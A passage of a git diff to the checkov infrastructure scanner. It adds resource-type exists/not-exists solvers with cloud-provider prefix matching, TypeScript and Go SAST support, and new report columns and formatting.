@@ -54,7 +51,7 @@ def _put_json_object(s3_client: S3Client, json_obj: Any, bucket: str, object_pat
     try:
         s3_client.put_object(Bucket=bucket, Key=object_path, Body=json.dumps(json_obj, cls=CustomJSONEncoder))
     except Exception:
-        logging.error(f"failed to persist object into S3 bucket {bucket}", exc_info=log_stack_trace_on_error)
+        logging.error(f"failed to persist object into S3 bucket {bucket} - {object_path}", exc_info=log_stack_trace_on_error)
         raise
 
 
diff --git a/checkov/common/checks_infra/checks_parser.py b/checkov/common/checks_infra/checks_parser.py
index 33f296a1812..2f7ae2d1efd 100644
--- a/checkov/common/checks_infra/checks_parser.py
+++ b/checkov/common/checks_infra/checks_parser.py
@@ -58,10 +58,13 @@
 )
 from checkov.common.checks_infra.solvers.connections_solvers.connection_one_exists_solver import \
     ConnectionOneExistsSolver
+from checkov.common.checks_infra.solvers.resource_solvers import ExistsResourcerSolver, NotExistsResourcerSolver
+from checkov.common.checks_infra.solvers.resource_solvers.base_resource_solver import BaseResourceSolver
 from checkov.common.graph.checks_infra.base_check import BaseGraphCheck
 from checkov.common.graph.checks_infra.base_parser import BaseGraphCheckParser
 from checkov.common.graph.checks_infra.enums import SolverType
 from checkov.common.graph.checks_infra.solvers.base_solver import BaseSolver
+from checkov.common.util.env_vars_config import env_vars_config
 from checkov.common.util.type_forcers import force_list
 
 if TYPE_CHECKING:
@@ -144,6 +147,12 @@
     "attribute": SolverType.ATTRIBUTE,
     "connection": SolverType.CONNECTION,
     "filter": SolverType.FILTER,
+    "resource": SolverType.RESOURCE,
+}
+
+operator_to_resource_solver_classes: dict[str, Type[BaseResourceSolver]] = {
+    "exists": ExistsResourcerSolver,
+    "not_exists": NotExistsResourcerSolver,
 }
 
 JSONPATH_PREFIX = "jsonpath_"
@@ -195,6 +204,7 @@ def parse_raw_check(self, raw_check: Dict[str, Dict[str, Any]], **kwargs: Any) -
         check.guideline = raw_check.get("metadata", {}).get("guideline")
         check.check_path = kwargs.get("check_path", "")
         solver = self.get_check_solver(check)
+        solver.providers = providers
         check.set_solver(solver)
 
         return check
@@ -238,7 +248,11 @@ def _parse_raw_check(self, raw_check: Dict[str, Any], resources_types: Optional[
                     or (isinstance(resource_type, str) and resource_type.lower() == "all")
                     or (isinstance(resource_type, list) and resource_type[0].lower() == "all")
             ):
-                check.resource_types = resources_types or []
+                if env_vars_config.CKV_SUPPORT_ALL_RESOURCE_TYPE:
+                    check.resource_types = ['all']
+                else:
+                    check.resource_types = resources_types or []
+
             elif "provider" in resource_type and providers:
                 for provider in providers:
                     check.resource_types.append(f"provider.{provider.lower()}")
@@ -298,6 +312,9 @@ def get_check_solver(self, check: BaseGraphCheck) -> BaseSolver:
             SolverType.FILTER: operator_to_filter_solver_classes.get(check.operator, lambda *args: None)(
                 check.resource_types, check.attribute, check.attribute_value
             ),
+            SolverType.RESOURCE: operator_to_resource_solver_classes.get(check.operator, lambda *args: None)(
+                check.resource_types
+            ),
         }
 
         solver = type_to_solver.get(check.type)  # type:ignore[arg-type]  # if not str will return None
diff --git a/checkov/common/checks_infra/solvers/attribute_solvers/base_attribute_solver.py b/checkov/common/checks_infra/solvers/attribute_solvers/base_attribute_solver.py
index 1a30bad1ee8..46a472d05e3 100644
--- a/checkov/common/checks_infra/solvers/attribute_solvers/base_attribute_solver.py
+++ b/checkov/common/checks_infra/solvers/attribute_solvers/base_attribute_solver.py
@@ -51,7 +51,7 @@ def run(self, graph_connector: LibraryGraph) -> Tuple[List[Dict[str, Any]], List
 
         if isinstance(graph_connector, DiGraph):
             for _, data in graph_connector.nodes(data=True):
-                if (not self.resource_types or data.get(CustomAttributes.RESOURCE_TYPE) in self.resource_types) \
+                if self.resource_type_pred(data, self.resource_types) \
                         and data.get(CustomAttributes.BLOCK_TYPE) in SUPPORTED_BLOCK_TYPES:
                     jobs.append(executer.submit(
                         self._process_node, data, passed_vertices, failed_vertices, unknown_vertices))
@@ -60,8 +60,7 @@ def run(self, graph_connector: LibraryGraph) -> Tuple[List[Dict[str, Any]], List
             return passed_vertices, failed_vertices, unknown_vertices
 
         for _, data in graph_connector.nodes():
-            if (not self.resource_types or data.get(CustomAttributes.RESOURCE_TYPE) in self.resource_types) \
-                    and data.get(CustomAttributes.BLOCK_TYPE) in SUPPORTED_BLOCK_TYPES:
+            if self.resource_type_pred(data, self.resource_types) and data.get(CustomAttributes.BLOCK_TYPE) in SUPPORTED_BLOCK_TYPES:
                 jobs.append(executer.submit(
                     self._process_node, data, passed_vertices, failed_vertices, unknown_vertices))
 
@@ -151,10 +150,14 @@ def _process_node(
         else:
             failed_vertices.append(data)
 
+    # override in case we need to check all values in a list
+    def should_check_all_condition(self) -> bool:
+        return self.is_jsonpath_check
+
     def _evaluate_attribute_matches(
         self, vertex: dict[str, Any], attribute_matches: list[str], filtered_attribute_matches: list[str]
     ) -> bool | None:
-        if self.is_jsonpath_check:
+        if self.should_check_all_condition():
             if self.resource_type_pred(vertex, self.resource_types) and all(
                 self._get_operation(vertex=vertex, attribute=attr) for attr in filtered_attribute_matches
             ):
diff --git a/checkov/common/checks_infra/solvers/attribute_solvers/not_contains_attribute_solver.py b/checkov/common/checks_infra/solvers/attribute_solvers/not_contains_attribute_solver.py
index a42e8717760..1a39967f237 100644
--- a/checkov/common/checks_infra/solvers/attribute_solvers/not_contains_attribute_solver.py
+++ b/checkov/common/checks_infra/solvers/attribute_solvers/not_contains_attribute_solver.py
@@ -9,3 +9,6 @@ class NotContainsAttributeSolver(ContainsAttributeSolver):
 
     def _get_operation(self, vertex: Dict[str, Any], attribute: Optional[str]) -> bool:
         return not super()._get_operation(vertex, attribute)
+
+    def should_check_all_condition(self) -> bool:
+        return True
diff --git a/checkov/common/checks_infra/solvers/attribute_solvers/range_includes_attribute_solver.py b/checkov/common/checks_infra/solvers/attribute_solvers/range_includes_attribute_solver.py
index 81c3cde5756..6e57a5039eb 100644
--- a/checkov/common/checks_infra/solvers/attribute_solvers/range_includes_attribute_solver.py
+++ b/checkov/common/checks_infra/solvers/attribute_solvers/range_includes_attribute_solver.py
@@ -1,4 +1,4 @@
-from typing import Optional, Any, Dict, List
+from typing import Optional, Any, Dict, List, Union
 from checkov.common.checks_infra.solvers.attribute_solvers.base_attribute_solver import BaseAttributeSolver
 from checkov.common.graph.checks_infra.enums import Operators
 from checkov.common.util.type_forcers import force_int
@@ -8,9 +8,13 @@ class RangeIncludesAttributeSolver(BaseAttributeSolver):
     operator = Operators.RANGE_INCLUDES  # noqa: CCE003  # a static attribute
 
     def __init__(
-        self, resource_types: List[str], attribute: Optional[str], value: Any, is_jsonpath_check: bool = False
+            self, resource_types: List[str], attribute: Optional[str], value: Union[Any, List[Any]],
+            is_jsonpath_check: bool = False
     ) -> None:
-        super().__init__(resource_types, attribute, force_int(value), is_jsonpath_check)
+        # Convert value to a list if it's not already one to unify handling
+        value = [force_int(v) if isinstance(v, (str, int)) else v for v in
+                 (value if isinstance(value, list) else [value])]
+        super().__init__(resource_types, attribute, value, is_jsonpath_check)
 
     def _get_operation(self, vertex: Dict[str, Any], attribute: Optional[str]) -> bool:
         attr = vertex.get(attribute)  # type:ignore[arg-type]  # due to attribute can be None
@@ -18,6 +22,12 @@ def _get_operation(self, vertex: Dict[str, Any], attribute: Optional[str]) -> bo
         if attr is None:
             return False
 
+        if isinstance(attr, list):
+            return any(self._check_value(value, attr_val) for attr_val in attr for value in self.value)
+
+        return any(self._check_value(value, attr) for value in self.value)
+
+    def _check_value(self, value: Any, attr: Any) -> bool:
         # expects one of the following values:
         # - an actual int
         # - a string that parses to an int
@@ -28,11 +38,15 @@ def _get_operation(self, vertex: Dict[str, Any], attribute: Optional[str]) -> bo
             return True
 
         if isinstance(attr, str) and attr.count("-") == 1:
-            try:
-                start, end = attr.split("-")
-                return True if force_int(start) <= self.value <= force_int(end) else False
-            except (TypeError, ValueError):
-                # Occurs if there are not two entries or if one is not an int, in which case we just give up
-                return False
-
-        return True if force_int(attr) == self.value else False
+            return self._check_range(value, attr)
+
+        return bool(force_int(attr) == value)
+
+    @staticmethod
+    def _check_range(value: Any, range_str: str) -> bool:
+        try:
+            start, end = range_str.split("-")
+            return bool(force_int(start) <= value <= force_int(end))
+        except (TypeError, ValueError):
+            # Occurs if there are not two entries or if one is not an int, in which case we just give up
+            return False
diff --git a/checkov/common/checks_infra/solvers/resource_solvers/__init__.py b/checkov/common/checks_infra/solvers/resource_solvers/__init__.py
new file mode 100644
index 00000000000..cc33f5a072d
--- /dev/null
+++ b/checkov/common/checks_infra/solvers/resource_solvers/__init__.py
@@ -0,0 +1,2 @@
+from checkov.common.checks_infra.solvers.resource_solvers.not_exists_resource_solver import ExistsResourcerSolver  # noqa
+from checkov.common.checks_infra.solvers.resource_solvers.not_exists_resource_solver import NotExistsResourcerSolver  # noqa
diff --git a/checkov/common/checks_infra/solvers/resource_solvers/base_resource_solver.py b/checkov/common/checks_infra/solvers/resource_solvers/base_resource_solver.py
new file mode 100644
index 00000000000..5d6f061f4ee
--- /dev/null
+++ b/checkov/common/checks_infra/solvers/resource_solvers/base_resource_solver.py
@@ -0,0 +1,68 @@
+from __future__ import annotations
+
+from abc import abstractmethod
+from typing import Any, Callable, TYPE_CHECKING
+
+from networkx import DiGraph
+
+import concurrent.futures
+
+from concurrent.futures import ThreadPoolExecutor
+
+from checkov.common.graph.checks_infra.enums import SolverType
+from checkov.common.graph.checks_infra.solvers.base_solver import BaseSolver
+from checkov.common.graph.graph_builder import CustomAttributes
+
+if TYPE_CHECKING:
+    from checkov.common.typing import LibraryGraph
+
+
+class BaseResourceSolver(BaseSolver):
+    def __init__(self, resource_types: list[str]) -> None:
+        super().__init__(SolverType.RESOURCE)
+        self.resource_types = resource_types
+        self.vertices: list[dict[str, Any]] = []
+
+    @abstractmethod
+    def get_operation(self, resource_type: str) -> bool:
+        raise NotImplementedError()
+
+    def _get_operation(self, *args: Any, **kwargs: Any) -> Callable[..., bool]:
+        # not needed
+        return lambda: True
+
+    def run(
+        self, graph_connector: LibraryGraph
+    ) -> tuple[list[dict[str, Any]], list[dict[str, Any]], list[dict[str, Any]]]:
+        executer = ThreadPoolExecutor()
+        jobs = []
+        passed_vertices: list[dict[str, Any]] = []
+        failed_vertices: list[dict[str, Any]] = []
+        unknown_vertices: list[dict[str, Any]] = []
+
+        if isinstance(graph_connector, DiGraph):
+            for _, data in graph_connector.nodes(data=True):
+                jobs.append(executer.submit(self._process_node, data, passed_vertices, failed_vertices, unknown_vertices))
+
+            concurrent.futures.wait(jobs)
+            return passed_vertices, failed_vertices, unknown_vertices
+
+        for _, data in graph_connector.nodes():
+            result = self.get_operation(resource_type=data.get(CustomAttributes.RESOURCE_TYPE))
+            if result:
+                passed_vertices.append(data)
+            else:
+                failed_vertices.append(data)
+
+        return passed_vertices, failed_vertices, []
+
+    def _process_node(self, data: dict[str, str], passed_vartices: list[dict[str, Any]],
+                      failed_vertices: list[dict[str, Any]], unknown_vertices: list[dict[str, Any]]) -> None:
+        result = self.get_operation(data.get(CustomAttributes.RESOURCE_TYPE))  # type:ignore[arg-type]
+        # A None indicate for UNKNOWN result - the vertex shouldn't be added to the passed or the failed vertices
+        if result is None:
+            unknown_vertices.append(data)
+        elif result:
+            passed_vartices.append(data)
+        else:
+            failed_vertices.append(data)
diff --git a/checkov/common/checks_infra/solvers/resource_solvers/exists_resource_solver.py b/checkov/common/checks_infra/solvers/resource_solvers/exists_resource_solver.py
new file mode 100644
index 00000000000..b54189c0935
--- /dev/null
+++ b/checkov/common/checks_infra/solvers/resource_solvers/exists_resource_solver.py
@@ -0,0 +1,12 @@
+from __future__ import annotations
+
+
+from checkov.common.graph.checks_infra.enums import Operators
+from checkov.common.checks_infra.solvers.resource_solvers.base_resource_solver import BaseResourceSolver
+
+
+class ExistsResourcerSolver(BaseResourceSolver):
+    operator = Operators.EXISTS  # noqa: CCE003  # a static attribute
+
+    def get_operation(self, resource_type: str | None) -> bool:
+        return resource_type in self.resource_types
diff --git a/checkov/common/checks_infra/solvers/resource_solvers/not_exists_resource_solver.py b/checkov/common/checks_infra/solvers/resource_solvers/not_exists_resource_solver.py
new file mode 100644
index 00000000000..d8d34a801af
--- /dev/null
+++ b/checkov/common/checks_infra/solvers/resource_solvers/not_exists_resource_solver.py
@@ -0,0 +1,13 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.checks_infra.solvers.resource_solvers.exists_resource_solver import ExistsResourcerSolver
+from checkov.common.graph.checks_infra.enums import Operators
+
+
+class NotExistsResourcerSolver(ExistsResourcerSolver):
+    operator = Operators.NOT_EXISTS  # noqa: CCE003  # a static attribute
+
+    def get_operation(self, *args: Any, **kwargs: Any) -> bool:
+        return not super().get_operation(*args, **kwargs)
diff --git a/checkov/common/graph/checks_infra/enums.py b/checkov/common/graph/checks_infra/enums.py
index 388a86d1e4a..9858bb6641d 100644
--- a/checkov/common/graph/checks_infra/enums.py
+++ b/checkov/common/graph/checks_infra/enums.py
@@ -20,6 +20,9 @@ class SolverType(str, Enum):
     FILTER = "FILTER"
     # Filters results according to specific value / type, i.e. resource type is aws_s3_bucket
 
+    RESOURCE = "RESOURCE"
+    # Used to define allow/deny lists of resource types
+
 
 class Operators:
     ANY = 'any'
diff --git a/checkov/common/graph/checks_infra/solvers/base_solver.py b/checkov/common/graph/checks_infra/solvers/base_solver.py
index cb7dc58dc24..2258a7ba1b4 100644
--- a/checkov/common/graph/checks_infra/solvers/base_solver.py
+++ b/checkov/common/graph/checks_infra/solvers/base_solver.py
@@ -4,16 +4,24 @@
 from typing import Tuple, List, Dict, Any, TYPE_CHECKING
 
 from checkov.common.graph.checks_infra.enums import SolverType
+from checkov.common.graph.graph_builder import CustomAttributes
+from checkov.common.util.env_vars_config import env_vars_config
 
 if TYPE_CHECKING:
     from networkx import DiGraph
 
+# Based on the resource names in iac frameworks
+AWS_KEYS = ['aws_', 'AWS::', 'aws-']
+GCP_KEYS = ['gcloud', 'google_']
+AZURE_KEYS = ['azurerm_', 'Microsoft.']
+
 
 class BaseSolver:
     operator = ""  # noqa: CCE003  # a static attribute
 
     def __init__(self, solver_type: SolverType) -> None:
         self.solver_type = solver_type
+        self.providers: List[str] = []
 
     @abstractmethod
     def get_operation(self, *args: Any, **kwargs: Any) -> Any:
@@ -27,6 +35,30 @@ def _get_operation(self, *args: Any, **kwargs: Any) -> Any:
     def run(self, graph_connector: DiGraph) -> Tuple[List[Dict[str, Any]], List[Dict[str, Any]], List[Dict[str, Any]]]:
         raise NotImplementedError()
 
-    @staticmethod
-    def resource_type_pred(v: Dict[str, Any], resource_types: List[str]) -> bool:
-        return not resource_types or ("resource_type" in v and v["resource_type"] in resource_types)
+    def resource_type_pred(self, v: Dict[str, Any], resource_types: List[str]) -> bool:
+        resource_type = CustomAttributes.RESOURCE_TYPE
+        if env_vars_config.CKV_SUPPORT_ALL_RESOURCE_TYPE:
+            is_all_resources = isinstance(resource_types, list) and resource_types[0].lower() == "all"
+            resource_type_match_provider = self.resource_match_provider(v.get(resource_type, ''))
+            support_all_resources = bool(resource_type in v and is_all_resources and v.get(resource_type) != 'module' and resource_type_match_provider)
+
+            return not resource_types or support_all_resources
+
+        return not resource_types or (resource_type in v and v[resource_type] in resource_types)
+
+    def resource_match_provider(self, resource_type: str) -> bool:
+        if not self.providers:
+            return True
+        for provider in self.providers:
+            if provider.lower() == 'aws':
+                if any(resource_type.startswith(key) for key in AWS_KEYS):
+                    return True
+            elif provider.lower() == 'gcp':
+                if any(resource_type.startswith(key) for key in GCP_KEYS):
+                    return True
+            elif provider.lower() == 'azure':
+                if any(resource_type.startswith(key) for key in AZURE_KEYS):
+                    return True
+            else:  # if we don't have a provider or the provider was not one of the basic providers
+                return True
+        return False
diff --git a/checkov/common/graph/graph_builder/graph_components/attribute_names.py b/checkov/common/graph/graph_builder/graph_components/attribute_names.py
index ed796ee0137..2439c8efa33 100644
--- a/checkov/common/graph/graph_builder/graph_components/attribute_names.py
+++ b/checkov/common/graph/graph_builder/graph_components/attribute_names.py
@@ -23,6 +23,7 @@ class CustomAttributes:
     ENCRYPTION = "encryption_"
     ENCRYPTION_DETAILS = "encryption_details_"
     TF_RESOURCE_ADDRESS = "__address__"
+    PROVIDER_ADDRESS = "__provider_address__"
     REFERENCES = "references_"
     FOREACH_ATTRS = "foreach_attrs_"
     SOURCE_MODULE_OBJECT = "source_module_object_"
diff --git a/checkov/common/models/consts.py b/checkov/common/models/consts.py
index 00a448c3b56..46db66e3397 100644
--- a/checkov/common/models/consts.py
+++ b/checkov/common/models/consts.py
@@ -27,7 +27,9 @@
 SAST_SUPPORTED_FILE_EXTENSIONS = {
     SastLanguages.JAVA: ['.java'],
     SastLanguages.JAVASCRIPT: ['.js'],
-    SastLanguages.PYTHON: ['.py']
+    SastLanguages.TYPESCRIPT: ['.ts'],
+    SastLanguages.PYTHON: ['.py'],
+    SastLanguages.GOLANG: ['.go']
 }
 
 ANY_VALUE = "CKV_ANY"
diff --git a/checkov/common/models/enums.py b/checkov/common/models/enums.py
index 12e428bcfdf..2f302e1f1e2 100644
--- a/checkov/common/models/enums.py
+++ b/checkov/common/models/enums.py
@@ -26,6 +26,7 @@ class CheckCategories(Enum):
     SUPPLY_CHAIN = 11
     API_SECURITY = 12
     SAST = 13
+    AI_AND_ML = 14
 
 
 class OutputFormat(Enum):
diff --git a/checkov/common/output/csv.py b/checkov/common/output/csv.py
index 2f85730d8b5..5ab899a0b2d 100644
--- a/checkov/common/output/csv.py
+++ b/checkov/common/output/csv.py
@@ -39,7 +39,7 @@
 FILE_NAME_CONTAINER_IMAGES = f"{date_now}_container_images.csv"
 
 FILE_NAME_IAC = f"{date_now}_iac.csv"
-HEADER_IAC = ["Resource", "Path", "Git Org", "Git Repository", "Misconfigurations", "Severity"]
+HEADER_IAC = ["Resource", "Path", "Git Org", "Git Repository", "Misconfigurations", "Severity", "Policy title", "Guideline"]
 
 CTA_NO_API_KEY = "SCA, image and runtime findings are only available with a Prisma Cloud subscription."
 
@@ -115,11 +115,15 @@ def add_iac_resources(self, resource: Record | ExtraResource, git_org: str, git_
 
         misconfig = None
         severity = None
+        check_name = None
+        guideline = None
         if isinstance(resource, Record) and resource.check_result["result"] == CheckResult.FAILED:
             # only failed resources should be added with their misconfiguration
             misconfig = resource.check_id
             if resource.severity is not None:
                 severity = resource.severity.name
+            check_name = resource.check_name
+            guideline = resource.guideline
         elif resource_id in self.iac_resource_cache:
             # IaC resources shouldn't be added multiple times, if they don't have any misconfiguration
             return
@@ -131,6 +135,8 @@ def add_iac_resources(self, resource: Record | ExtraResource, git_org: str, git_
             "Git Repository": git_repository,
             "Misconfigurations": misconfig,
             "Severity": severity,
+            "Policy title": check_name,
+            "Guideline": guideline
         }
 
         if isinstance(resource, Record) and resource.details:
diff --git a/checkov/common/output/report.py b/checkov/common/output/report.py
index 42762782bc7..1d46ec8ee4f 100644
--- a/checkov/common/output/report.py
+++ b/checkov/common/output/report.py
@@ -20,14 +20,12 @@
 from checkov.common.typing import _ExitCodeThresholds, _ScaExitCodeThresholds
 from checkov.common.output.record import Record, SCA_PACKAGE_SCAN_CHECK_NAME
 from checkov.common.sast.consts import POLICIES_ERRORS, POLICIES_ERRORS_COUNT, SOURCE_FILES_COUNT, POLICY_COUNT
-from checkov.common.util.consts import PARSE_ERROR_FAIL_FLAG, CHECKOV_RUN_SCA_PACKAGE_SCAN_V2, S3_UPLOAD_DETAILS_MESSAGE
+from checkov.common.util.consts import PARSE_ERROR_FAIL_FLAG, S3_UPLOAD_DETAILS_MESSAGE
 from checkov.common.util.json_utils import CustomJSONEncoder
 from checkov.runner_filter import RunnerFilter
 
 from checkov.sca_package_2.output import create_cli_output as create_sca_package_cli_output_v2
 
-from checkov.sca_package.output import create_cli_output as create_sca_package_cli_output_v1
-
 from checkov.policies_3d.output import create_cli_output as create_3d_policy_cli_output
 
 from checkov.version import version
@@ -311,7 +309,7 @@ def print_console(
         # output for vulnerabilities is different
         if self.check_type in (CheckType.SCA_PACKAGE, CheckType.SCA_IMAGE):
             if self.failed_checks or self.skipped_checks:
-                create_cli_output = create_sca_package_cli_output_v2 if CHECKOV_RUN_SCA_PACKAGE_SCAN_V2 else create_sca_package_cli_output_v1
+                create_cli_output = create_sca_package_cli_output_v2
                 output_data += create_cli_output(self.check_type == CheckType.SCA_PACKAGE, self.failed_checks,
                                                  self.skipped_checks)
 
@@ -369,20 +367,30 @@ def print_failed_github_md(self, use_bc_ids: bool = False) -> str:
             result.append(
                 [
                     record.get_output_id(use_bc_ids),
-                    record.file_path,
-                    record.resource,
                     record.check_name,
-                    record.guideline,
+                    record.resource,
+                    f"[Link]({record.guideline})",
+                    record.file_path,
                 ]
             )
         if result:
+            summary = self.get_summary()
+            if self.parsing_errors:
+                message = "Passed Checks: {}, Failed Checks: {}, Skipped Checks: {}, Parsing Errors: {}\n\n".format(
+                    summary["passed"],
+                    summary["failed"],
+                    summary["skipped"],
+                    summary["parsing_errors"],
+                )
+            else:
+                message = f"```\nPassed Checks: {summary['passed']}, Failed Checks: {summary['failed']}, Skipped Checks: {summary['skipped']}\n```\n\n"
+
             table = tabulate(
                 result,
-                headers=["check_id", "file", "resource", "check_name", "guideline"],
+                headers=["Check ID", "Check Name", "Resource", "Guideline", "File"],
                 tablefmt="github",
-                showindex=True,
             )
-            output_data = f"### {self.check_type} scan results:\n\n{table}\n\n---\n"
+            output_data = f"### {self.check_type.replace('_', ' ').title()} Scan Results:\n\n{message}{table}\n\n---\n"
             return output_data
         else:
             return "\n\n---\n\n"
diff --git a/checkov/common/runners/object_runner.py b/checkov/common/runners/object_runner.py
index a41397fa722..15eaba47e9c 100644
--- a/checkov/common/runners/object_runner.py
+++ b/checkov/common/runners/object_runner.py
@@ -123,13 +123,13 @@ def run(
                 if self.graph_registry:
                     self.graph_registry.load_external_checks(directory)
 
+        if root_folder:
+            self.root_folder = root_folder
+
         if not self.context or not self.definitions:
             if files:
                 self._load_files(files)
-
             if root_folder:
-                self.root_folder = root_folder
-
                 for root, d_names, f_names in os.walk(root_folder):
                     filter_ignored_paths(root, d_names, runner_filter.excluded_paths, self.included_paths())
                     filter_ignored_paths(root, f_names, runner_filter.excluded_paths, self.included_paths())
diff --git a/checkov/common/runners/runner_registry.py b/checkov/common/runners/runner_registry.py
index e0cf96b440c..69685c005ce 100644
--- a/checkov/common/runners/runner_registry.py
+++ b/checkov/common/runners/runner_registry.py
@@ -149,7 +149,6 @@ def run(
             # then raise a clear error
             # if some frameworks are disabled and the user used --framework, log a warning so they see it
             # if some frameworks are disabled and the user did not use --framework, then log at a lower level so that we have it for troubleshooting
-            frameworks_specified = self.runner_filter.framework and 'all' not in self.runner_filter.framework
             if not valid_runners:
                 runners_categories = os.linesep.join([f'{runner.check_type}: {self.licensing_integration.get_subscription_for_runner(runner.check_type).name}' for runner in invalid_runners])
                 error_message = f'All the frameworks are disabled because they are not enabled in the platform. ' \
@@ -157,8 +156,10 @@ def run(
                 logging.error(error_message)
                 raise ModuleNotEnabledError(error_message)
             elif invalid_runners:
-                level = logging.WARNING if frameworks_specified else logging.INFO
                 for runner in invalid_runners:
+                    level = logging.INFO
+                    if runner.check_type in self.runner_filter.framework_flag_values:
+                        level = logging.WARNING
                     logging.log(level, f'The framework "{runner.check_type}" is part of the "{self.licensing_integration.get_subscription_for_runner(runner.check_type).name}" module, which is not enabled in the platform')
 
             valid_runners = self._merge_runners(valid_runners)
diff --git a/checkov/common/sast/consts.py b/checkov/common/sast/consts.py
index c90a6cc9348..ee568dcbe7f 100644
--- a/checkov/common/sast/consts.py
+++ b/checkov/common/sast/consts.py
@@ -1,5 +1,12 @@
 from enum import Enum
 from typing import List, Any, Set
+from pathlib import Path
+
+
+SAST_FRAMEWORK_PREFIX = 'sast'
+CDK_FRAMEWORK_PREFIX = 'cdk'
+# checkov/checkov/cdk/checks
+CDK_CHECKS_DIR_PATH = Path(__file__).parent.parent.parent / CDK_FRAMEWORK_PREFIX / "checks"
 
 
 class SastLanguages(Enum):
@@ -14,6 +21,8 @@ def set(cls) -> Set["SastLanguages"]:
     PYTHON = 'python'
     JAVA = 'java'
     JAVASCRIPT = 'javascript'
+    TYPESCRIPT = 'typescript'
+    GOLANG = 'golang'
 
 
 class CDKLanguages(Enum):
@@ -26,6 +35,7 @@ def set(cls) -> Set["CDKLanguages"]:
         return set(cls)
 
     PYTHON = 'python'
+    TYPESCRIPT = 'typescript'
 
 
 class BqlVersion(str, Enum):
@@ -47,12 +57,16 @@ def get_bql_version_from_string(version_str: str) -> str:
     SastLanguages.PYTHON: ['py'],
     SastLanguages.JAVA: ['java'],
     SastLanguages.JAVASCRIPT: ['js'],
+    SastLanguages.TYPESCRIPT: ['ts'],
+    SastLanguages.GOLANG: ['go'],
 }
 
 FILE_EXT_TO_SAST_LANG = {
     'py': SastLanguages.PYTHON,
     'java': SastLanguages.JAVA,
     'js': SastLanguages.JAVASCRIPT,
+    'ts': SastLanguages.TYPESCRIPT,
+    'go': SastLanguages.GOLANG,
 }
 
 POLICIES_ERRORS = 'policies_errors'
diff --git a/checkov/common/sast/report_types.py b/checkov/common/sast/report_types.py
index 5252c92231d..150dac34a16 100644
--- a/checkov/common/sast/report_types.py
+++ b/checkov/common/sast/report_types.py
@@ -23,6 +23,7 @@ class MatchLocation(BaseModel):
     start: Point  # noqa: CCE003
     end: Point  # noqa: CCE003
     code_block: str  # noqa: CCE003
+    extended_code_block: Optional[Dict[str, Any]] = None   # noqa: CCE003
 
     @model_serializer
     def serialize_model(self) -> Dict[str, Any]:
@@ -98,6 +99,11 @@ class Repositories(BaseModel):
     files: Dict[str, File]  # noqa: CCE003
 
 
+class SkippedCheck(BaseModel):
+    check_id: str   # noqa: CCE003
+    suppress_comment: str   # noqa: CCE003
+
+
 class PrismaReport(BaseModel):
     rule_match: Dict[SastLanguages, Dict[str, RuleMatch]]  # noqa: CCE003
     errors: Dict[str, List[str]]  # noqa: CCE003
@@ -105,13 +111,15 @@ class PrismaReport(BaseModel):
     run_metadata: Dict[str, Optional[Union[str, int, List[str]]]]  # noqa: CCE003
     imports: Dict[SastLanguages, Dict[str, Dict[str, Union[List[str], Dict[str, str]]]]]  # noqa: CCE003
     reachability_report: Dict[SastLanguages, Dict[str, Repositories]]   # noqa: CCE003
+    skipped_checks_by_file: Dict[str, List[SkippedCheck]]   # noqa: CCE003
 
 
 def create_empty_report(languages: List[SastLanguages]) -> PrismaReport:
     matches: Dict[SastLanguages, Dict[str, RuleMatch]] = {}
     for lang in languages:
         matches[lang] = {}
-    return PrismaReport(rule_match=matches, errors={}, profiler={}, run_metadata={}, imports={}, reachability_report={})
+    return PrismaReport(rule_match=matches, errors={}, profiler={}, run_metadata={}, imports={}, reachability_report={},
+                        skipped_checks_by_file={})
 
 
 def serialize_reachability_report(report: Dict[str, Repositories]) -> Dict[str, Any]:
diff --git a/checkov/common/sca/output.py b/checkov/common/sca/output.py
index 41bf0588cff..7c53364f51b 100644
--- a/checkov/common/sca/output.py
+++ b/checkov/common/sca/output.py
@@ -182,9 +182,15 @@ def create_report_cve_record(
     package_type = get_package_type(package_name, package_version, sca_details)
     cve_id = vulnerability_details.get("id", vulnerability_details.get("cveId", '')).upper()
     severity = vulnerability_details.get("severity", DEFAULT_SEVERITY)
+
     # sanitize severity names
     if severity == "moderate":
         severity = "medium"
+    if severity.upper() not in Severities:
+        logging.warning(f"unknown severity - severity '{severity}' is unknown. using the DEFAULT_SEVERITY: '{DEFAULT_SEVERITY}' instead. "
+                        f"vulnerabilities-details: {vulnerability_details}")
+        severity = DEFAULT_SEVERITY
+
     description = vulnerability_details.get("description")
 
     check_result: _CheckResult = {
diff --git a/checkov/common/sca/reachability/package_alias_mapping/nodejs/utils.py b/checkov/common/sca/reachability/package_alias_mapping/nodejs/utils.py
index 5fb99c8a267..05dd9beb45f 100644
--- a/checkov/common/sca/reachability/package_alias_mapping/nodejs/utils.py
+++ b/checkov/common/sca/reachability/package_alias_mapping/nodejs/utils.py
@@ -13,6 +13,14 @@
 EXPORT_DEFAULT_PATTERN = r'export\s*default\s*({.*?});'
 
 
+def load_json_with_comments(json_str: str) -> Any:
+    # Regular expression to remove comments (both single line and multi-line)
+    pattern = r'(?<!\\)(["\'])(?:(?=(\\?))\2.)*?\1|//.*?$|/\*[\s\S]*?\*/'
+    regex = re.compile(pattern, re.MULTILINE)
+    clean_json_str = regex.sub(lambda match: match.group(0) if match.group(1) else '', json_str)
+    return json.loads(clean_json_str)
+
+
 def _parse_export(file_content: str, pattern: str) -> Dict[str, Any] | None:
     module_export_match = re.search(pattern, file_content, re.DOTALL)
 
@@ -40,7 +48,7 @@ def parse_webpack_file(file_content: str, relevant_packages: Set[str]) -> Dict[s
 
 def parse_tsconfig_file(file_content: str, relevant_packages: Set[str]) -> Dict[str, Any]:
     output: Dict[str, Any] = {"packageAliases": {}}
-    tsconfig_json = json.loads(file_content)
+    tsconfig_json = load_json_with_comments(file_content)
     paths = tsconfig_json.get("compilerOptions", {}).get("paths", {})
     for imported_name in paths:
         for package_relative_path in paths[imported_name]:
@@ -52,7 +60,7 @@ def parse_tsconfig_file(file_content: str, relevant_packages: Set[str]) -> Dict[
 
 def parse_babel_file(file_content: str, relevant_packages: Set[str]) -> Dict[str, Any]:
     output: Dict[str, Any] = {"packageAliases": {}}
-    babelrc_json = json.loads(file_content)
+    babelrc_json = load_json_with_comments(file_content)
     plugins = babelrc_json.get("plugins", {})
     for plugin in plugins:
         if len(plugin) > 1:
@@ -91,7 +99,7 @@ def parse_rollup_file(file_content: str, relevant_packages: Set[str]) -> Dict[st
 def parse_package_json_file(file_content: str, relevant_packages: Set[str]) -> Dict[str, Any]:
     output: Dict[str, Any] = {"packageAliases": {}}
